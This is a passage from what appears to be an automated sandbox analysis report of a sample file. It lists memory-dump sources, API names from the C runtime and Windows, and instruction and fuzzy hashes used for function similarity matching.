          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: File$ChangeCloseCreateFindNotificationReadmalloc
          • String ID:
          • API String ID: 3030868933-0
          • Opcode ID: 0d7a0df5af22e230d4f3bfebb7c531e3786f628436d433eea651e926c987b041
          • Instruction ID: 310ef416ba3fc35ce741c9fad48f15c3aeb80c4722f6d5eb00a6ea32e321bfec
          • Opcode Fuzzy Hash: 0d7a0df5af22e230d4f3bfebb7c531e3786f628436d433eea651e926c987b041
          • Instruction Fuzzy Hash: 02312531701614ABD714EBA8CC41BAFB7A9EB86320F104369F915EB3C1DB786E058795
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: malloc
          • String ID:
          • API String ID: 2803490479-0
          • Opcode ID: e6b20e7136eaf225ead9669c55d895fecdeeab65b9cf6d86eb5e011854791531
          • Instruction ID: 807259a2224352d6cccd3686e8d714b606015058a99c83894affaede93009279
          • Opcode Fuzzy Hash: e6b20e7136eaf225ead9669c55d895fecdeeab65b9cf6d86eb5e011854791531
          • Instruction Fuzzy Hash: 6721D6713416156BE3109F58EC81B9BB7D9EF84769F108539F649CB682DB30D9048B90
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: __mtterm
          • String ID:
          • API String ID: 13288775-0
          • Opcode ID: bb3b4fef79ff40b797f52ec53adaaaf4c46e1792d09417c137102318ad7435d3
          • Instruction ID: 4769802cd3aa723f287484ec0f1d42076249fe283dc1389e14d2d1d980cd83f1
          • Opcode Fuzzy Hash: bb3b4fef79ff40b797f52ec53adaaaf4c46e1792d09417c137102318ad7435d3
          • Instruction Fuzzy Hash: 7111233254524CD9DA35FBB9BC068FE2F5B9E917A0730452AF304801B2DE3B88528169
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d32f006e1bcd0d748d86bbfce1deccc964eb71f38a0f71ff9539b00f9e76d4d1
          • Instruction ID: 7151d1926b19541a2580f1bf92508fff9aa6373148e947a3b9144cea42e9e0d2
          • Opcode Fuzzy Hash: d32f006e1bcd0d748d86bbfce1deccc964eb71f38a0f71ff9539b00f9e76d4d1
          • Instruction Fuzzy Hash: C8310636D0025CDBCF25EF69C8845BEBFB7EF44310F14456AE9959F262C63A9802CB90
          APIs
          • ___scrt_release_startup_lock.LIBCMT ref: 00060822
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: ___scrt_release_startup_lock
          • String ID:
          • API String ID: 1340410277-0
          • Opcode ID: 3e542b1dcd36e51a68e77000ab5373cf47bbbe62739b27e5daac494ce062c300
          • Instruction ID: c97cefa939fcf3abb101b25d9f2b79f1ef34910ce43a6c688d317c488a674afb
          • Opcode Fuzzy Hash: 3e542b1dcd36e51a68e77000ab5373cf47bbbe62739b27e5daac494ce062c300
          • Instruction Fuzzy Hash: A401FD32AC12159EDB61BBF08C036EF6AA79F523A5F180258F4C07B083ED624941D7F2
          APIs
          • ??3@YAXPAX@Z.MSVCRT(?,7D5DF9B0,?,?,?), ref: 00054886
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: ??3@
          • String ID:
          • API String ID: 613200358-0
          • Opcode ID: 98f7a9bf8d6153b808645ec5ea890976b306553de1c056b1577c4c2a8f3a6694
          • Instruction ID: fd1a2c093315837ae1bdcd81c6f89d336cbe1f03e8807820d23b79538e21082f
          • Opcode Fuzzy Hash: 98f7a9bf8d6153b808645ec5ea890976b306553de1c056b1577c4c2a8f3a6694
          • Instruction Fuzzy Hash: 53F0BE72D44658EBD710DB88DC41B9BF7ACEB44B20F00427AF819A3780DB796A0486D1
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: FreeLibrary
          • String ID:
          • API String ID: 3664257935-0
          • Opcode ID: 4fecc3627165a0c69ec1b6e35af70e36bf093190d36ec330a306980e3f241b9e
          • Instruction ID: 9cb8959e9e5ccce2649540c14c570f7bfeb35110744d6a5399f7e6dff3402da5
          • Opcode Fuzzy Hash: 4fecc3627165a0c69ec1b6e35af70e36bf093190d36ec330a306980e3f241b9e
          • Instruction Fuzzy Hash: 80D0C2B2E0412402C6206E1DE4803AAB3C9CB953B6F4208BAED8DE7140CA218C804790
          APIs
          • malloc.MSVCRT(0006AF98,7D5DF9B0,?,?), ref: 000547D6
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: malloc
          • String ID:
          • API String ID: 2803490479-0
          • Opcode ID: 1d880cdbdbc7f033a51ce2cae86b8e5fc29a9016efd681c068d81ff42ccddbc1
          • Instruction ID: 2834ea01285f697694794384461878e4a64a6bfdf0e29c6c4a66438d2da3e9e0
          • Opcode Fuzzy Hash: 1d880cdbdbc7f033a51ce2cae86b8e5fc29a9016efd681c068d81ff42ccddbc1
          • Instruction Fuzzy Hash: 2C01B572E04554ABD310DB99EC41BABF7E8EB85A64F04427FFC18D3740EB396A14C691
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID: CorExitProcess$R5{n$mscoree.dll
          • API String ID: 0-3592129520
          • Opcode ID: caf35854a486e308cbdee70b1caca05273f27e323e5101518863e26595ee7702
          • Instruction ID: b9dc25a3a022211e71677a7b8ee17131a5cfe2fecdc7640104b71b62d0a00d74
          • Opcode Fuzzy Hash: caf35854a486e308cbdee70b1caca05273f27e323e5101518863e26595ee7702
          • Instruction Fuzzy Hash: 08017C35A01608BBDF11AB54DD0AB9D7B7AAF50792F004054F901AA061C7B8CF41DBD0
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID: @srH
          • API String ID: 0-2313782270
          • Opcode ID: 75f5fddcaf58a86a29f76e1266e33ec0494a73780a358cf304a4059d9f0b8d0f
          • Instruction ID: 35848d1eca75a523ef2f8c761d0efdeb886e1067eace1e4061e2357b31438cf6
          • Opcode Fuzzy Hash: 75f5fddcaf58a86a29f76e1266e33ec0494a73780a358cf304a4059d9f0b8d0f
          • Instruction Fuzzy Hash: 9CA12D3260ABE58FDB129F38D8867E97FA0EA57360758069CD4848F143D7299807C78A
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ccb7093e16c9f610319d12910585a1f1502e205445daece038ef71f74b886dd4
          • Instruction ID: c33000dc889d8412a13b6a3e121819e231e429add4f26394d2069f8fa07a04fe
          • Opcode Fuzzy Hash: ccb7093e16c9f610319d12910585a1f1502e205445daece038ef71f74b886dd4
          • Instruction Fuzzy Hash: 99325730700A0497DB24AA25C4952BFF2B3AFC4362F24572DDC52477D6EB74AE4A97C1
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
